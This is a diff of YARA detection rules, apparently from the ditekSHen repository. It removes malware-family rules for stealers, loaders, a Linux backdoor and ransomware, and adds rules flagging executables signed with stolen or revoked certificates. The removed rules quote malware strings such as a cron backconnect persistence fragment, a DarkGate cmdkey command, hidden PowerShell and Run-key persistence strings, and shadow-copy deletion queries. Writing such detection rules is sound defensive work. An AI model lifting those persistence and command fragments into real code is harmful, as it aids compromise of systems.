+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S.O.M GmbH" and ( pe.signatures [ i ] . serial == "b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" or pe.signatures [ i ] . serial == "00:b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" ) )
 }
-rule DITEKSHEN_MALWARE_Multi_Golangbypassav : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0D83E7F47189Cdbfc7Fa3E5F58882329 : FILE
 {
 	meta:
-		description = "Detect Go executables using GolangBypassAV"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bd41ff7e-ce57-5bee-b6ca-9341b4c1c1fa"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6574aab4-f307-53c2-8cf7-bcc7565facc8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10679-L10689"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4621-L4632"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "842dfc7c04cbd19bbbc8b6fbf9d9925f81a21dfb713af4542ca4157d64fa5b51"
+		logic_hash = "c4dffcad286e161980ccec2188459b8b7eaf0e982c7c69ca5ffbaf8e4d85d1b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.GolangBypassAV"
-		clamav2 = "MALWARE.Linux.Trojan.GolangBypassAV"
-
-	strings:
-		$s1 = "/GolangBypassAV/gen/" ascii
+		thumbprint = "ba4bf6d8caac468c92dd7cd4303cbdb2c9f58886"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" )
 }
-rule DITEKSHEN_MALWARE_Win_Blankstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008385684419Ab26A3F2640B1496E1Fe94 : FILE
 {
 	meta:
-		description = "Detects BlankStealer / BlankGrabber / Blank-c Stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "19686781-4be8-56c1-b606-d8fe14dbdc48"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5aa92ac6-241f-54a1-b828-f8a5deb6d212"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10691-L10703"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4634-L4645"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc0c8d3e0061d192e445ef661387360644ab428a9e9fc2480e966db96bc8264c"
+		logic_hash = "7c9de438d5c7156052e30ce70310aaa989ff1896f7b34ffc6c4fd8fc2bc60b85"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort = "923829001"
-
-	strings:
-		$s1 = "Blank-c" ascii
-		$s2 = "Stealer License" ascii
-		$s3 = "UID=" ascii
-		$h1 = { 42 6c 61 6e 6b 2d 63 0a 53 74 65 61 6c 65 72 20 4c 69 63 65 6e 73 65 0a 55 49 44 3d }
+		thumbprint = "ee1d7d90957f3f2ccfcc069f5615a5bafdac322f"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x4152 and 2 of them ) or ( all of ( $s* ) or 1 of ( $h* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" )
 }
-rule DITEKSHEN_MALWARE_Linux_Getshell : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Aec3D3F752A38617C1D7A677D0B5591 : FILE
 {
 	meta:
-		description = "Detect GetShell Linux backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cccad93d-cd49-5237-96ac-66c9ac6ef532"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8e1bb307-733c-5626-98f6-a5c2587bf800"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10705-L10725"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4647-L4658"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9d44ad2a3c270eed0e905402e8c32dcca54da90f4229d9d59874ee09b3b47277"
+		logic_hash = "4bbe5aac8a470061abab48070fafd2100c577cab1f40fcc5924dbd13bc747487"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Linux.Trojan.GetShell"
-
-	strings:
-		$x1 = "cat <(echo '@reboot echo socks5_backconnect" ascii
-		$x2 = "(cd  && )') <(sed '/socks5_backconnect" ascii
-		$s1 = "cat <(echo '@" ascii
-		$s2 = "(cd  && )') <(sed '" ascii
-		$s3 = "PORT1:" ascii
-		$s4 = "HOST1:" ascii
-		$s5 = "queryheader" ascii
-		$s6 = "qsectionpost" ascii
-		$s7 = "packedip" ascii
-		$s8 = "copydata" ascii
-		$s9 = "synsend" ascii
-		$s10 = "bc_connect" ascii
+		thumbprint = "1d41b9f7714f221d76592e403d2fbb0f0310e697"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( ( all of ( $x* ) and 1 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" )
 }
-rule DITEKSHEN_MALWARE_Win_Solarmarker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E5B2Af04Ea4B84A94609A47Eba3164Ec : FILE
 {
 	meta:
-		description = "Detects SolarMarker"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "78c2f739-76b2-5a80-8b9a-6c677d578eaa"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ea78ae13-cd9f-578a-95e4-906ab7045faf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10727-L10745"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4660-L4671"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84182c8948c2f40439cd932885ae8b88bb677ecc9fba366f22d30e13dc4ffb68"
+		logic_hash = "2e32bb0d9689625cd860a75539961410241de341ad4b7ee661df7d3b2dd47c46"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "token_type" fullword ascii
-		$x2 = "request_data" fullword ascii
-		$x3 = "request_timeout" fullword ascii
-		$x4 = { 74 6f 6b 65 6e 73 00 66 72 6f 6d 00 74 6f 00 73 5f (66|72) }
-		$s1 = "set_UseShellExecute" fullword ascii
-		$s2 = "<Select>b__0" fullword ascii
-		$s3 = "<get>b__e" fullword ascii
-		$s4 = "<get>b__10" fullword ascii
-		$s5 = "<get>b__f" fullword ascii
-		$s6 = "<set>b__0" fullword ascii
-		$s7 = "<set>b__1" fullword ascii
+		thumbprint = "7785d50066faee71d1a463584c1a97f34431ddfe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RRGRQJRWZHRTLFAUVK" and pe.signatures [ i ] . serial == "e5:b2:af:04:ea:4b:84:a9:46:09:a4:7e:ba:31:64:ec" )
 }
-rule DITEKSHEN_MALWRE_Win_Darkgate : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Dummy01 : FILE
 {
 	meta:
-		description = "Detects DarkGate infostealer and coinminer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4488e1e6-daac-5832-8326-3151c834daf1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "eaf3bbdd-72b4-513c-9a5b-04f16292fa00"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10747-L10771"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4673-L4687"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "805a04bbb3915d539e76927393384a2786c25490e8b9fc151d5b12415247578b"
+		logic_hash = "c72ac977ef92feead0a7ec72ec99b1a11f20b8c5258a08842a4dceddff91d659"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "SYSTEM Elevation: Completed, new DarkGate connection with SYSTEM privileges" ascii
-		$x2 = "-u 0xDark" ascii
-		$x3 = "DarkGate" ascii
-		$x4 = "/c cmdkey /generic:\"127.0.0.2\" /user:\"SafeMode\" /pass:\"darkgatepassword0\"" ascii
-		$s1 = "c:\\temp\\crash.txt" ascii
-		$s2 = "/cookiesfile \"" ascii
-		$s3 = "/c rmdir /s /q \"" ascii
-		$s4 = "/c xcopy /E /I /Y \"%s\" \"%s\" && exit" ascii
-		$s5 = "U_MemScan" ascii
-		$s6 = "U_Google_AD" ascii
-		$s7 = "untBotUtils" ascii
-		$s8 = "____padoru____" ascii
-		$s9 = "u_SysHook" ascii
-		$s10 = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=" ascii
-		$s11 = "C:\\Windows\\System32\\ntdll.dll" fullword ascii
-		$s12 = /(SYSTEM )?Elevation: (Cannot|I already|AT RAW|FAILURE)/ ascii
-		$s13 = /Stub: (WARNING:|Configuration updated:|Global Ping Invoked)/ ascii
+		thumbprint1 = "16b7eb40b97149f49e8ec885b0a7fa7598f5a00f"
+		thumbprint2 = "902bf957b57f134619443d80cb8767250e034110"
+		thumbprint3 = "505f0055a66216c81420f41335ea7a4eb7b240fe"
+		thumbprint4 = "c05a6806d770dcec780e0477b83f068a1082be06"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) ) ) or ( 10 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy certificate" and pe.signatures [ i ] . serial == "01" )
 }
-rule DITEKSHEN_MALWARE_Win_Rookie_Downloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A7E1Dc5352C3852C5523030F57F2425C : FILE
 {
 	meta:
-		description = "Detect malware downlaoder, variant of ZombieBoy downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a991eecb-5275-5e33-bea4-e709590474a8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "fba8f1a8-ca08-5d6f-a83e-c817daf94703"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10773-L10786"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4689-L4700"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d5625c2cd7e3a51c2fce9948e691ff2d1b7cf85083708790f89e15c6522059b"
+		logic_hash = "06c151ae8b4a45eccef028ea69f0adf74445bd4d871fc65cc1d308f2005cede1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.RookIE-Downloader"
-
-	strings:
-		$s1 = "shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}" fullword ascii
-		$s2 = "taskkill /f /im hh.exe" fullword ascii
-		$s3 = "RookIE/1.0" fullword ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" fullword ascii
-		$s5 = "#32770" fullword ascii
+		thumbprint = "09232474b95fc2cfb07137e1ada82de63ffe6fcd"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" )
 }
-rule DITEKSHEN_MALWARE_Win_Fiber : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_635517466B67Bd4Bba805Bc67Ac3328C : FILE
 {
 	meta:
-		description = "Detects Fiber .NET injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0e562e2e-cb91-5acf-bb8f-5e7e7d971a3d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b7533186-b5dc-53ce-912b-39bd42c92071"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10788-L10824"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4702-L4713"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd6c2c02272fe59c8d7de533197f15d94b5532d32875f01e3e4bd52506456a34"
+		logic_hash = "71cdb314e2f6bda70f9f627d72aea49290fdbce66f76a170aa6571873ca82860"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "0b3144ec936028cbf5292504ef2a75eea8eb6c1d"
+		importance = 20
 
-	strings:
-		$x1 = "Fiber.dll" fullword ascii
-		$s1 = "-WindowStyle Hidden Copy-Item -Path *.vbs -Destination" wide
-		$s2 = "-WindowStyle Hidden {0} -WindowStyle Hidden Start-Sleep 5; Start-Process {1}" wide
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s4 = "WScript.Shell" fullword wide
-		$s5 = "{0}_{1:N}.lnk" fullword wide
-		$s6 = "notepad.exe,0" fullword wide
-		$i1 = "AppLaunch.exe" fullword wide
-		$i2 = "aspnet_regbrowsers.exe" fullword wide
-		$i3 = "cvtres.exe" fullword wide
-		$i4 = "ilasm.exe" fullword wide
-		$i5 = "jsc.exe" fullword wide
-		$i6 = "MSBuild.exe" fullword wide
-		$i7 = "RegAsm.exe" fullword wide
-		$i8 = "RegSvcs.exe" fullword wide
-		$v1 = "is tampered" wide
-		$v2 = "Debugger Detected" wide
-		$v3 = "RepositoryUrl" ascii
-		$v4 = { 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00
-                74 00 75 00 61 00 6c 00 20 00 00 0b 41 00 6c 00
-                6c 00 6f 00 63 00 00 0d 57 00 72 00 69 00 74 00
-                65 00 20 00 00 11 50 00 72 00 6f 00 63 00 65 00
-                73 00 73 00 20 00 00 0d 4d 00 65 00 6d 00 6f 00
-                72 00 79 00 00 0f 50 00 72 00 6f 00 74 00 65 00
-                63 00 74 00 00 0b 4f 00 70 00 65 00 6e 00 20 00
-                00 0f 50 00 72 00 6f 00 63 00 65 00 73 00 73 00
-                00 0d 43 00 6c 00 6f 00 73 00 65 00 20 00 00 0d
-                48 00 61 00 6e 00 64 00 6c 00 65 00 00 0f 6b 00
-                65 00 72 00 6e 00 65 00 6c }
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "63:55:17:46:6b:67:bd:4b:ba:80:5b:c6:7a:c3:32:8c" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_A2253Aeb5B0Ff1Aecbfd412C18Ccf07A : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "82d70dae-97e7-5fa3-8a91-de6143fa2164"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4729-L4740"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "357de1cbdf3223dfb1a920bfb15bbbd66906de5225c0ed015e5a3fbbbb65a753"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "b03db8e908dcf0e00a5a011ba82e673d91524816"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) and 2 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) or ( 2 of ( $s* ) and 6 of ( $i* ) ) or ( 1 of ( $x* ) and 3 of ( $v* ) ) or ( all of ( $v* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gallopers Software Solutions Limited" and pe.signatures [ i ] . serial == "a2:25:3a:eb:5b:0f:f1:ae:cb:fd:41:2c:18:cc:f0:7a" )
 }
-rule DITEKSHEN_MALWARE_Win_Unknown_Packedloader_01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_21E3Cae5B77C41528658Ada08509C392 : FILE
 {
 	meta:
-		description = "Detects unknown loader / packer. Observed running LummaStealer"
-		author = "ditekShen"
-		id = "2969090f-dff9-5745-b87d-a031741dd2e0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "bd97478f-1b75-542d-814c-8d318d745240"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10826-L10845"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4742-L4753"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6fd9075793b55e04c68bb13d21b88741889a9c37a0a9d1a19d895c7b68af4506"
+		logic_hash = "c860e888b19b98c40cf00babfb022a79a35f12def0077733e796b2aeeea324ea"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Error at hooking API \"%S\"" wide
-		$s2 = "Dumping first %d bytes:" wide
-		$s3 = "Error at initialization of bundled DLL: %s" wide
-		$s4 = "GetMemoryForDLL()" ascii
-		$s5 = "type=activation&code=" ascii
-		$s6 = "activation.php?code=" ascii
-		$s7 = "&hwid=" ascii
-		$s8 = "&hash=" ascii
-		$s9 = "type=deactivation&hash=" ascii
-		$s10 = "deactivation.php?hash=" ascii
-		$s11 = "BANNED" fullword ascii
-		$s12 = "GetAdaptersInfo" ascii
+		thumbprint = "8acfaa12e5d02c1e0daf0a373b0490d782ea5220"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 11 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" )
 }
-rule DITEKSHEN_MALWARE_Win_LOLKEK : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_09B3A7E559Fcb024C4B66B794E9540Cb : FILE
 {
 	meta:
-		description = "Detects LOLKEK / GlobeImposter ransowmare"
-		author = "ditekShen"
-		id = "96374c8d-2ef7-5706-a96f-27d60f73f8c1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "5e1057d4-a40c-5e48-8965-91fd533c04dc"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10847-L10864"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4790-L4802"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "047492f8b7b56c75cfdcc4359de2b02a76cf9591b902171785806987e552995a"
+		logic_hash = "345abbb31986fe3f8f6b7eb05c73d4d42daa9df6a7706b9cd2fb4f8aac61d40b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "$Recycle.bin" fullword wide
-		$s2 = "\\\\?\\%c:" fullword wide
-		$s3 = ".MMM" fullword wide
-		$s4 = "ReadMe.txt" fullword wide
-		$s5 = "select * from Win32_ShadowCopy" fullword wide
-		$s6 = "Win32_ShadowCopy.ID='%s'" fullword wide
-		$s7 = "W3CRYPTO LOCKER" ascii
-		$s8 = "http://mmcb" ascii
-		$s9 = "yip.su/2QstD5" ascii
-		$s10 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe" ascii
+		thumbprint = "59c60ade491c9eda994711b1fdb59510baad2ea3"
+		hash1 = "b57d694b6d1f9e0634953e8f5c1e4faf84fb50be806a8887dd5b31bfd58a167f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Windscribe Limited" and pe.signatures [ i ] . serial == "09:b3:a7:e5:59:fc:b0:24:c4:b6:6b:79:4e:95:40:cb" )
 }
-rule DITEKSHEN_MALWARE_Win_Spacecolon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_19Beff8A6C129663E5E8C18953Dc1F67 : FILE
 {
 	meta:
-		description = "Detects Spacecolon ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "38bde0b6-96a3-5081-b152-c251d7a2ffac"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8bc27a0c-898d-510f-ad9d-78d5bab40cad"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10866-L10886"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4804-L4815"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6e55c45f9df98bc152dadc1ba0953b4b89b5a503af0fc5ba53e12a1aa4f6d28"
+		logic_hash = "e62c4ab0652f872887b7bedadba3306c831351f57bc4a177302b1268d823f9f4"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "eraseext" fullword ascii
-		$s2 = "*.encrypted" fullword ascii
-		$s3 = "TIMATOMA#" fullword wide
-		$s4 = ".Encrypted" fullword wide
-		$s5 = "Already Encrypted" wide
-		$s6 = "note.txt" fullword wide
-		$s7 = "HOW TO RECOVERY FILES.TXT" fullword wide
-		$s8 = "taskkill /f /im \"" wide nocase
-		$s9 = "\\kill.bat" wide
-		$s10 = "Search cancelled -" fullword wide
-		$s11 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" fullword wide
-		$s12 = "Our TOX ID :" ascii
-		$s13 = "tufhackteam@gmail.com" ascii
+		thumbprint = "ad3deacd821fee3bb158665bd7fa491e39aab2e6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" )
 }
-rule DITEKSHEN_MALWARE_Win_Rhysida : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : FILE
 {
 	meta:
-		description = "Detects Rhysida ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a70bdf19-3b56-5dc0-be74-20a2e85099cc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "610f4147-9b32-5d96-bf27-10a8e0c3c347"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10888-L10902"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4817-L4828"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb15f497cdee40b237dfc2aafcde2da95ff2a6f9c162273862ec1a0053269932"
+		logic_hash = "d3e625c05e974650bb9750f6dadbbba5825a34ea10902c807b9da457902d2b59"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "cmd.exe /c reg add \"HK" ascii
-		$s2 = "rundll32.exe user32.dll,UpdatePerUserSystemParameters" fullword ascii
-		$s3 = "C:/Users/Public/bg.jpg" fullword ascii
-		$s4 = "CriticalBreachDetected.pdf" fullword ascii
-		$s5 = "rhysida" ascii
-		$s6 = "cmd.exe /c reg delete \"HKCU\\Cont" ascii
-		$s7 = "Rhysida-" ascii
+		thumbprint = "0c212cdf3d9a46621c19af5c494ff6bad25d3190"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) or ( 3 of ( $s* ) and #s1 > 5 )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o." and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" )
 }
-rule DITEKSHEN_MALWARE_Win_Povertystealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_56F008E69A7C4C3Feb389C66Eaf58259 : FILE
 {
 	meta:
-		description = "Detects PovertyStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a431b82a-81cb-51a9-b3a8-61d71f36a60e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bcd0cd8e-82ec-5d20-85d1-cbad455b6d90"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10904-L10917"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4830-L4841"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d8a4dd1f3a9935935878840d19e16d91d240da776f99eb2dd3f12df96efa1d9"
+		logic_hash = "3ba02eb734b461b02744c5fc901e45f4574249607398fb8a73850d5d5e89788b"
 		score = 75
